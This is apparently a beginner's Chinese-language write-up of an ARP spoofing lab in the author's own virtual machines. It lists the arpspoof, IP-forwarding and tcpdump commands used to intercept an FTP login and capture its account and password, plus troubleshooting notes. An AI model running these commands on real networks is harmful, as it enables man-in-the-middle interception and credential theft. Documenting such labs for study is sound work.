近日自己完成了一次简单的ARP欺骗实例,在此总结一下过程和途中所遇到的问题
过程总结
1.下载VM虚拟机,安装好2台虚拟机(一台WindowsServer2003一台Kali)还有一台本机
2.把虚拟机的网段配置和主机在同一网段
3.把WindowsServer2003配置成一台服务器
4.在WindowsServer2003创建一个用户
以上完成后
1.kali开启路由转发功能
(echo 1 >/proc/sys/net/ipv4/ip_forward)
2.kali告诉WindowsServer2003我是本机
(arpspoof -i eth0 -t 服务器的IP 主机IP)
3…kali告诉本机WindowsServer2003
(arpspoof -i eth0 -t 主机IP 服务器的IP)
4.kali开始抓包
(tcpdump -nn -X tcp -port 21)
5.本机输入账号密码正常访问服务器的ftp
6.kali抓获到账号密码
途中所遇到的问题
1.3台主机不能互相通讯
(虚拟机设置成桥接模式,关闭或者设置防火墙)
2.不知道如何将server2003配置成服务器
(开始菜单>管理工具>管理您的服务器>新建服务器>选择应用程序服务器双击)
3.kali对本机和服务器做完欺骗后本机无法连接服务器
(启初是以为kali没有ftp的原因,于是就弄了一个ftp.rpm的包,结果发现kali里面没有rpm这个命令,于是去下载源,还是没有完成) //我发现kali有好多命令都没有不知道是我镜像问题还是其他什么原因
最后发现并不是kali没有安装ftp的问题而是路由转发功能会断,不知道是我网络的问题还是什么原因,重新开启路由转发功能就可以成功访问并捕获到账号密码了)
注:作者是个刚刚入门的小白很多知识并不清楚,此文章只是用于我完成实例后对自己所学的一个总结,里面如果有不专业或者错误的地方欢迎大家指出,我们共同学习进步,另外关于没有rpm这个命令我依然没有解决如果有会的小伙伴欢迎指点